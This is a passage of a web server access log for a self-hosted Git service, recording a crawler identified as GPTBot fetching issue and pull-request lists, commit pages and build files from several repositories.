3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=open&type=all" -[17/Feb/2026:18:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11040] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9874] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9877] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" -[17/Feb/2026:18:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2f%eb%8d%b0%ec%9d%b4%ed%84%b0%eb%b2%a0%ec%9d%b4%ec%8a%a4%20%ed%8a%b8%eb%a6%ac%ea%b1%b0%20%ec%a0%81%ec%9a%a9.md" [Client 74.7.227.38] [Length 22615] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" -[17/Feb/2026:18:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11274] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:42:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:42:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:18:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:18:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9876] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 1065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:18:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 44900] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:18:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:42:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:42:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr 